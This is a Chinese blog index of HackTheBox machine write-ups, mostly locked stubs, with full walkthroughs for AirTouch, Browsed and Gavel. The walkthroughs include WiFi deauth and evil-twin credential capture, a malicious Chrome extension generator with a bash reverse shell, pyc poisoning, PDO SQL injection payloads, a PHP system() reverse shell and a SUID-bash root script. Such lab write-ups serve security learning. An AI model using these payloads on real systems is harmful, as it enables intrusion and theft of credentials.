喵喵喵喵

PingPong - HackTheBox

2026-04-30T13:56:46.000Z

您好, 这里需要密码. Administrator aesKey: fe77******4496

Logging - HackTheBox

2026-04-21T10:30:07.000Z

您好, 这里需要密码. Administrator hash: a0c1******bdb5

Silentium - HackTheBox

2026-04-18T12:29:00.000Z

您好, 这里需要密码. root hash: $y$j9T$ZiVbn******F9wR0

Garfield - HackTheBox

2026-04-11T10:11:14.000Z

您好, 这里需要密码. Administrator hash: ee23******92d5

DevArea - HackTheBox

2026-03-30T05:29:46.000Z

您好, 这里需要密码. root hash: $y$j9T$0KQ.Tn******qmdr9

Kobold - HackTheBox

2026-03-24T03:17:07.000Z

您好, 这里需要密码. root hash: $y$j9T$Y2.8/1PJ******j3loTXPD.Z4

VariaType - HackTheBox

2026-03-20T12:28:55.000Z

您好, 这里需要密码. root hash: $y$j9T$U22iZ******L1G8gzIv9.

CCTV - HackTheBox

2026-03-14T09:27:38.000Z

您好, 这里需要密码. root hash: $y$j9T$yA2tQ1******dkAXzT989

Pirate - HackTheBox

2026-03-04T07:49:27.000Z

您好, 这里需要密码. Administrator hash: 5982******5171

Interpreter - HackTheBox

2026-02-24T06:39:52.000Z

您好, 这里需要密码. root hash: $y$j9T$o.VVihLzQt******HoWrWOJto7

WingData - HackTheBox

2026-02-20T12:21:25.000Z

您好, 这里需要密码. root hash: $y$j9T$o4QbpI9M******5Xtghz.E5V3A

Pterodactyl - HackTheBox

2026-02-12T07:30:26.000Z

您好, 这里需要密码. root hash: $6$iOhjvxjnk.Sgt97C$Fr******7KDOFHT7bOTZG.a0

Facts - HackTheBox

2026-02-05T07:24:37.000Z

您好, 这里需要密码. root hash: $y$j9T$7gs6******60ItpltO/x2nSB

Overwatch - HackTheBox

2026-02-01T11:24:53.000Z

您好, 这里需要密码. Administrator hash: 269f******bce6

AirTouch - HackTheBox

2026-01-21T10:23:44.000Z

基本信息

https://app.hackthebox.com/machines/AirTouch

端口扫描

TCP只有22，udp可以看到snmp：

$ nmap -sC -sV -Pn 10.129.186.97
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-21 14:50 JST
Nmap scan report for 10.129.186.97
Host is up (0.081s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 bd:90:00:15:cf:4b:da:cb:c9:24:05:2b:01:ac:dc:3b (RSA)
|   256 6e:e2:44:70:3c:6b:00:57:16:66:2f:37:58:be:f5:c0 (ECDSA)
|_  256 ad:d5:d5:f0:0b:af:b2:11:67:5b:07:5c:8e:85:76:76 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.64 seconds

$ sudo nmap -sU 10.129.186.97
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-21 14:52 JST
Nmap scan report for 10.129.186.97
Host is up (0.081s latency).
Not shown: 998 closed udp ports (port-unreach)
PORT    STATE         SERVICE
68/udp  open|filtered dhcpc
161/udp open          snmp

Nmap done: 1 IP address (1 host up) scanned in 1070.39 seconds

SNMP

常规snmp枚举发现一个密码：

snmpwalk -v 1 -c public 10.129.186.97

iso.3.6.1.2.1.1.1.0 = STRING: "\"The default consultant password is: RxBlZhLmOkacNWScmZ6D (change it after use it)\""
iso.3.6.1.2.1.1.4.0 = STRING: "admin@AirTouch.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "Consultant"

consultant

得到的账号密码ssh登录：

用户桌面两张图表明现在是在consultant的笔记本里，连接的单独的vlan，并且存在其他网络及wifi：

并且当前consultant可以无限制sudo，以及存在aircrack，所以下一步很明显是通过wifi访问其他网络：

AirTouch-Internet

capture & crack

所以就是常规wifi枚举，然后deauth抓握手包破解：

# 启动监听模式
airmon-ng start wlan0

# 查看wifi
airodump-ng wlan0mon
# AirTouch-Internet chanel 6
 F0:9F:C2:A3:F1:A7  28:6C:07:FE:A3:22  -29   48 - 1      0        4
 
# capture
airodump-ng -c 6 wlan0mon -w capture
# 另一个终端，deauth
aireplay-ng --deauth 10 -a F0:9F:C2:A3:F1:A7 wlan0mon -c 28:6C:07:FE:A3:22

回到第一个终端，看到已经获取到了握手包：

之后就是破解出密码：

1
2
3

aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

KEY FOUND! [ challenge ]

wifi

之后连接wifi：

1
2
3

sudo wpa_supplicant -Dnl80211 -iwlan3 -c /tmp/miao.conf

sudo dhclient wlan3 -v

获取到192.168.3网段ip地址：

miao.conf

network={
  ssid="AirTouch-Internet"
  psk="challenge"
  scan_ssid=1
  key_mgmt=WPA-PSK
  proto=WPA2
}

PSK Router

之后打通代理，可以访问到PSK Router界面：

1	ssh consultant@10.129.186.105 -D 8090

但现在还不知道密码

decrypt capture

回到capture部分，wireshark使用密码解密流量，可以在http请求中得到cookie,捕获够的情况下也能直接获取密码：

1 2	manager 2wLFYNh4TSTgA5sNgT4

manager

修改cookie登录到manager，现在只是user：

admin

这部分很简单，cookie里有个UserRole，原本是user，自己改成admin即可，然后多了个上传配置文件的功能：

webshell

不能直接传php，基础绕过，可以可以上传phtml，phar之类，www-data权限：

并且直接读取login.php可以得到另一个user的密码：

http://192.168.3.1/uploads/shell.phtml?cmd=cat%20../login.php

$logins = array(
    /*'user' => array('password' => 'JunDRDZKHDnpkpDDvay', 'role' => 'admin'),*/
    'manager' => array('password' => '2wLFYNh4TSTgA5sNgT4', 'role' => 'user')
  );

AirTouch-AP-PSK & user flag

使用user ssh登录进AirTouch-AP-PSK：

1 2	ssh user@192.168.3.1 JunDRDZKHDnpkpDDvay

无限制sudo，root用户目录得到user flag：

send_certs.sh

并且可以在send_certs.sh得到remote用户的密码和下一个网段的ip：

#!/bin/bash

# DO NOT COPY
# Script to sync certs-backup folder to AirTouch-office.

# Define variables
REMOTE_USER="remote"
REMOTE_PASSWORD="xGgWEwqUpfoOVsLeROeG"
REMOTE_PATH="~/certs-backup/"
LOCAL_FOLDER="/root/certs-backup/"

# Use sshpass to send the folder via SCP
sshpass -p "$REMOTE_PASSWORD" scp -r "$LOCAL_FOLDER" "$REMOTE_USER@10.10.10.1:$REMOTE_PATH"

以及certs-backup目录里一些证书文件，下一步要用到

eaphammer

回到AirTouch-Consultant那里，可以看到root目录有个eaphammer,很明显的提示下一步,evil twin attacks：

s0lst1c3/eaphammer: Targeted evil twin attacks against WPA2-Enterprise networks. Indirect wireless pivots using hostile portal attacks.
https://github.com/s0lst1c3/eaphammer
Evil Twin with Karma Attack in Enterprise WiFi Network
https://tbhaxor.com/evil-twin-with-karma-attack-using-eaphammer/

一步步来，得到AirTouch-Office的认证hash：

./eaphammer --cert-wizard import --server-cert ../server.crt --private-key ../server.key --ca-cert ../ca.crt

./eaphammer --cert-wizard list 

./eaphammer --bssid 'AC:8B:A9:AA:3F:D2' --essid 'AirTouch-Office' --channel 44 --interface wlan3 --auth wpa-eap --creds

# 等几分钟，得到hash
mschapv2: Sat Jan 24 10:30:27 2026
 domain\username:AirTouch\r4ulcl
 username:r4ulcl
 challenge:cb:16:26:f1:1a:1b:da:47
 response:44:3f:b4:84:79:5a:c4:fa:3b:3e:f4:0c:77:3c:6d:f5:d0:23:f6:f1:bb:27:ab:ed
 jtr NETNTLM:r4ulcl:$NETNTLM$cb1626f11a1bda47$443fb484795ac4fa3b3ef40c773c6df5d023f6f1bb27abed
 hashcat NETNTLM:r4ulcl::::443fb484795ac4fa3b3ef40c773c6df5d023f6f1bb27abed:cb1626f11a1bda47

破解出密码：

1
2
3

$ sudo hashcat -m 5500 hash.txt ~/Tools/dict/rockyou.txt

laboratory

AirTouch-Office

然后连接office wifi,得到corp网段ip：

1
2
3

wpa_supplicant -B -i wlan6 -c /tmp/office.conf

dhclient wlan6

office.conf

ctrl_interface=/var/run/wpa_supplicant
network={
    ssid="AirTouch-Office"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="AirTouch\\r4ulcl"
    password="laboratory"
    phase2="auth=MSCHAPV2"
}

AirTouch-AP-MGT

之后remote用户连接AirTouch-AP-MGT,密码就是前面得到的：

1 2	ssh remote@10.10.10.1 xGgWEwqUpfoOVsLeROeG

hostapd

然后在hostapd相关文件里得到admin密码：

remote@AirTouch-AP-MGT:~$ cat /etc/hostapd/hostapd_wpe.eap_user

"AirTouch\r4ulcl"    MSCHAPV2"laboratory" [2]
"admin"                MSCHAPV2"xMJpzXt4D9ouMuL3JJsMriF7KZozm7" [2]

admin

切到admin用户，可以无限制sudo：

root flag

admin无限制sudo：

shadow

1
2

remote:$6$ejcLoDyi/qlm6pQd$0pt.GvF47D3LbKCaJ283OVQ1Fi25cxqNy8sgO5mnsnIujrWOGkoGL/./5vAmdb5JSHGu0vPTE./Rh8bf6AJKZ1:20051:0:99999:7:::
admin:$6$vSTu8Nz336boicIm$pq/RGKu7jne0kd18NC9QgB8WCliwCbZTgiP.g71YI6BchhHvVRiW40W.GoMl9rGv6EyKyYaUxzRP5XWYIiKyL.:20051:0:99999:7:::

参考资料

s0lst1c3/eaphammer: Targeted evil twin attacks against WPA2-Enterprise networks. Indirect wireless pivots using hostile portal attacks.
https://github.com/s0lst1c3/eaphammer
Evil Twin with Karma Attack in Enterprise WiFi Network
https://tbhaxor.com/evil-twin-with-karma-attack-using-eaphammer/

Browsed - HackTheBox

2026-01-17T08:26:36.000Z

基本信息

https://app.hackthebox.com/machines/Browsed

端口扫描

22和80:

$ nmap -sC -sV -Pn 10.129.198.68
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-17 12:07 JST
Nmap scan report for 10.129.198.68
Host is up (0.095s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.14 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 02:c8:a4:ba:c5:ed:0b:13:ef:b7:e7:d7:ef:a2:9d:92 (ECDSA)
|_  256 53:ea:be:c7:07:05:9d:aa:9f:44:f8:bf:32:ed:5c:9a (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: Browsed
|_http-server-header: nginx/1.24.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.05 seconds

80

一个浏览器相关网站，可以上传插件：

Extension

看起来就是通过上传恶意插件，给的sample没什么用

crux

首先搜索已有的恶意插件可以找到这个：

mttaggart/crux: A proof-of-concept malicious Chrome extension
https://github.com/mttaggart/crux

修改成我们对应的，上传执行，得到一个url：

1	[+] URL: http://browsedinternals.htb/

Gitea

添加hosts后访问，是一个gitea：

1	10.129.201.12 browsedinternals.htb

MarkdownPreview

可以看到一个MarkdownPreview，app.py里看到调用routines.sh,唯一参数是rid:

然后去看routines.sh，发现可能的命令注入，因为使用数组：

所以这里就很清晰了，使用恶意插件去调用对应API触发命令注入

user flag

利用恶意插件触发命令注入，得到larry shell:

extension.py

copy from discord:

import zipfile
import io
import base64

def create_shell_extension(my_ip, my_port="9001"):
    zip_buffer = io.BytesIO()
    
    # 1. The Reverse Shell One-Liner (Standard Bash)
    # We encode it to avoid breaking the JSON or the URL string
    raw_shell = f"bash -i >& /dev/tcp/{my_ip}/{my_port} 0>&1"
    b64_shell = base64.b64encode(raw_shell.encode()).decode()
    
    # This is the payload that will be executed on the server
    # It decodes itself and pipes into bash
    shell_payload = f"echo${{IFS}}{b64_shell}|base64${{IFS}}-d|bash"

    # 2. Manifest V3
    manifest = '''{
        "manifest_version": 3,
        "name": "Security Optimizer",
        "version": "1.1",
        "background": {
            "service_worker": "background.js"
        },
        "host_permissions": ["*://127.0.0.1/*", "*://localhost/*"]
    }'''

    # 3. background.js
    # We will try both the routine path and a potential root injection
    background = f'''
    const ip = "{my_ip}";
    const payload = "{shell_payload}";
    
    // We send it via a background loop to ensure it fires
    async function triggerShell() {{
        const urls = [
            `http://127.0.0.1:5000/routines/a[$(${{payload}})]`,
            `http://127.0.0.1:5000/routines/a';${{payload}} #`
        ];

        for (const url of urls) {{
            fetch(url, {{ mode: 'no-cors' }});
        }}
    }}

    triggerShell();
    '''

    with zipfile.ZipFile(zip_buffer, 'a', zipfile.ZIP_DEFLATED) as zip_file:
        zip_file.writestr("manifest.json", manifest)
        zip_file.writestr("background.js", background)

    with open("shell_exploit.zip", "wb") as f:
        f.write(zip_buffer.getvalue())

    print(f"[+] shell_exploit.zip created.")
    print(f"[+] Listener command: nc -lvnp {my_port}")
    print(f"[+] Encoded payload: {shell_payload}")

if __name__ == "__main__":
    # Change this to your HTB Tun0 IP
    create_shell_extension("10.10.14.15", "4444")

提权信息

可以sudo运行指定的一个python文件：

尝试运行，看起来就是和前面那三个sqmple extension相关的：

pycache

我们对该文件没修改权限，但可以看到有pycache,里面是extension_utils的pyc，我们对pycache目录有权限，extension_tool.py也导入了extension_utils：

在有pyc缓存文件的情况下，python会优先使用pyc文件，所以我们可以通过修改pyc文件，并且可以设置UNCHECKED_HASH来让python跳过验证，从而执行代码

提权 & root flag

利用pyc文件获取root：

1
2
3

python3.12 /tmp/exploit.py
sudo /opt/extensiontool/extension_tool.py --ext Fontify
/tmp/rootbash -p

exploit.py

import os
import py_compile
import shutil
import sys

ORIGINAL_SRC = "/opt/extensiontool/extension_utils.py"
MALICIOUS_SRC = "/tmp/extension_utils.py"
# Fixed the path to __pycache__ based on your previous 'ls'
TARGET_PYC = "/opt/extensiontool/__pycache__/extension_utils.cpython-312.pyc"

stat = os.stat(ORIGINAL_SRC)
target_size = stat.st_size

# The payload that will execute as root
payload = 'import os\ndef validate_manifest(path): os.system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash"); return {}\ndef clean_temp_files(arg): pass\n'

# Padding with comments to match the exact size of the original file
padding_needed = target_size - len(payload)
payload += "#" * padding_needed

with open(MALICIOUS_SRC, "w") as f:
    f.write(payload)

# Sync timestamps
os.utime(MALICIOUS_SRC, (stat.st_atime, stat.st_mtime))

# Compile
py_compile.compile(MALICIOUS_SRC, cfile="/tmp/malicious.pyc")

# Inject
if os.path.exists(TARGET_PYC):
    os.remove(TARGET_PYC)
shutil.copy("/tmp/malicious.pyc", TARGET_PYC)
print("[+] Poisoned .pyc injected successfully")

shadow

1 2	root:$y$j9T$wXISIzb3EFHkpdXvsI01S.$7THiBdiDsTxmiImcIsYzzKyh3WxVeXd2F25m4xQGMD/:20317:0:99999:7::: larry:$y$j9T$7TMEcG9b0YPRMveUtoEgT/$VQx//iROmISMIDWdddYqhUGDezXhlM1ki0pnUij1rUB:20317:0:99999:7:::

参考资料

mttaggart/crux: A proof-of-concept malicious Chrome extension
https://github.com/mttaggart/crux
HackTheBox - Machine - Browsed - Mane’s Blog
https://manesec.github.io/2026/01/11/2026/01-hackthebox-Browsed/

Eloquia - HackTheBox

2025-12-20T10:45:28.000Z

您好, 这里需要密码. Administrator hash: e634******3a9a

MonitorsFour - HackTheBox

2025-12-13T07:58:34.000Z

您好, 这里需要密码. Administrator hash: 41f4******0225

Gavel - HackTheBox

2025-12-03T09:33:26.000Z

基本信息

https://app.hackthebox.com/machines/Gavel
10.10.11.97

端口扫描

22和80:

$ nmap -sC -sV -Pn 10.10.11.97
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-03 14:18 JST
Nmap scan report for 10.10.11.97
Host is up (0.19s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 1f:de:9d:84:bf:a1:64:be:1f:36:4f:ac:3c:52:15:92 (ECDSA)
|_  256 70:a5:1a:53:df:d1:d0:73:3e:9d:90:ad:c1:aa:b4:19 (ED25519)
80/tcp open  http    Apache httpd 2.4.52
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Did not follow redirect to http://gavel.htb/
Service Info: Host: gavel.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.46 seconds

80

需要加hosts

1	10.10.11.97 gavel.htb

拍卖相关的：

随意注册登录，就是正常的参与拍卖功能：

目录扫描

常规目录扫描发现git泄漏,以及admin：

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://gavel.htb/

/.git/config          (Status: 200) [Size: 136]
/.git/HEAD            (Status: 200) [Size: 23]
/.git                 (Status: 301) [Size: 305] [--> http://gavel.htb/.git/]
/.git/index           (Status: 200) [Size: 224718]
/admin.php            (Status: 302) [Size: 0] [--> index.php]
/.git/logs/           (Status: 200) [Size: 1128]
/assets               (Status: 301) [Size: 307] [--> http://gavel.htb/assets/]
/index.php            (Status: 200) [Size: 14027]
/includes             (Status: 301) [Size: 309] [--> http://gavel.htb/includes/]
/rules                (Status: 301) [Size: 306] [--> http://gavel.htb/rules/]

git

常规dump：

1	git-dumper http://gavel.htb/ Gavel_git

Code Review

接下来就是代码审计部分：

inventory.php

可以看到虽然使用了pdo，但col是从输入的sortItem简单替换字符后拼接到最终的sql语句中，所以如果精心构造，还是可以进行sql注入的，类似这个：

Novel SQL Injection Technique in PDO Prepared Statements
https://slcyber.io/research-center/a-novel-technique-for-sql-injection-in-pdos-prepared-statements/
PHP PDO Flaw Allows Attackers to Inject Malicious SQL Commands
https://gbhackers.com/php-pdo-flaw/

bid

bid相关代码里可以看到使用rule添加runkit function，如果我们可以控制rule，那就能够添加恶意函数从而RCE：

Web

sql injection

首先利用sql注入，获取到auctioneer hash，破解出密码

GET /inventory.php?user_id=x`+FROM+(SELECT+schema_name+AS+`'x`+from+information_schema.schemata)y;--+-&sort=\?;--+-%00

GET /inventory.php?user_id=x`+FROM+(SELECT+table_name+AS+`'x`+from+information_schema.tables)y;--+-&sort=\?;--+-%00

GET /inventory.php?user_id=x`+FROM+(SELECT+column_name+AS+`'x`+from+information_schema.columns)y;--+-&sort=\?;--+-%00

GET /inventory.php?user_id=x`+FROM+(SELECT+CONCAT(username,0x3a,password)+AS+`'x`+from+users)y;--+-&sort=\?;--+-%00

auctioneer:$2y$10$MNkDHV6g16FjW/lAQRpLiuQXN4MVkdMuILn0pLQlC2So9SgH5RTfS

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

midnight1

Admin Panel

得到的账号密码登录auctioneer，多了个admin panel，可以编辑rule和message：

而前面代码中也已经知道可以通过rule来达成RCE，所以这里就添加rule，然后去bid触发,打到www-data shell：

1	system('bash -c "bash -i >& /dev/tcp/10.10.14.8/4444 0>&1"'); return true;

user flag

切换到auctioneer用户即可：

gavel-util

常规枚举可以发现一个自定义的二进制文件gavel-util，看起来是提交yaml文件,并且/opt/gavel里有sample，测试执行后看起来是提交到后端server的,而这个是root在运行的：

1	root 937 0.0 0.1 19128 5964 ? Ss 04:48 0:00 /opt/gavel/gaveld

php.int

然后查看对应的php.ini可以看到大量disable_functions：

但我们的yaml里可以使用rule，所以同样的方法可以修改php.ini,然后就可以以root权限通过rule执行任意命令了

提权 & root flag

一步步手动修改php.ini后再执行命令，或者使用自动脚本：

exp.sh

copy from Discord:

#!/bin/bash
echo "[*] Screw Gavel Root Exploit"
echo "[*] Stand-by..."
WORKDIR="/tmp/pwn_$(date +%s)"
mkdir -p "$WORKDIR"
cd "$WORKDIR"
  
echo "[*] Step 1: Overwriting php.ini to remove disable_functions and open_basedir..."
cat << 'EOF_INI' > ini_overwrite.yaml
name: IniOverwrite
description: Removing restrictions
image: "data:image/png;base64,AA=="
price: 1337
rule_msg: "Config Pwned"
rule: |
  file_put_contents('/opt/gavel/.config/php/php.ini', "engine=On\ndisplay_errors=On\nopen_basedir=/\ndisable_functions=\n");
  return false;
EOF_INI
/usr/local/bin/gavel-util submit ini_overwrite.yaml
echo "[*] Config overwrite submitted. Waiting 5 seconds for stability..."
sleep 5
  
echo "[*] Step 2: Triggering system() to SUID /bin/bash..."
cat << 'EOF_SUID' > root_suid.yaml
name: RootSuid
description: Getting Root
image: "data:image/png;base64,AA=="
price: 1337
rule_msg: "Shell Pwned"
rule: |
  system("chmod u+s /bin/bash");
  return false;
EOF_SUID
/usr/local/bin/gavel-util submit root_suid.yaml
  
echo "[*] Payload submitted. Checking /bin/bash permissions..."
sleep 2
  
if ls -la /bin/bash | grep -q "rws"; then
    echo "[+] SUCCESS! /bin/bash is now SUID root."
    echo "[*] Spawning root shell and reading /root/root.txt ..."
    /bin/bash -p -c 'cat /root/root.txt; exec /bin/bash -p'
else
    echo "[-] Exploit failed. /bin/bash is not SUID."
    echo "[*] Trying alternative payload (copy bash)..."
  
    cat << 'EOF_COPY' > root_copy.yaml
name: RootCopy
description: Getting Root Alt
image: "data:image/png;base64,AA=="
price: 1337
rule_msg: "Shell Pwned Alt"
rule: |
  copy('/bin/bash', '/tmp/rootbash');
  chmod('/tmp/rootbash', 04755);
  return false;
EOF_COPY
    /usr/local/bin/gavel-util submit root_copy.yaml
    sleep 2
  
    if [ -f /tmp/rootbash ]; then
        echo "[+] Alternative payload SUCCESS! /tmp/rootbash created."
        echo "[*] Spawning root shell and reading /root/root.txt ..."
        /tmp/rootbash -p -c 'cat /root/root.txt; exec /tmp/rootbash -p'
    else
        echo "[-] All attempts failed."
        exit 1
    fi
fi

shadow

1
2

root:$y$j9T$F4t1iJQb1Y9atV89HlC.k.$rdYP7l6hwov0veW3K1LdYgljvILjVuoCkqlSf7OmAs3:20396:0:99999:7:::
auctioneer:$y$j9T$a4m13RlusE.ItZN9V0MQT1$N1nUleOlY2d1KmlIMvhzatvI5lBieVuAqhmgxcUbsc0:20364:0:99999:7:::

参考资料

Novel SQL Injection Technique in PDO Prepared Statements
https://slcyber.io/research-center/a-novel-technique-for-sql-injection-in-pdos-prepared-statements/
PHP PDO Flaw Allows Attackers to Inject Malicious SQL Commands
https://gbhackers.com/php-pdo-flaw/

Fries - HackTheBox

2025-11-29T06:30:00.000Z

您好, 这里需要密码. Administrator hash: a773******6748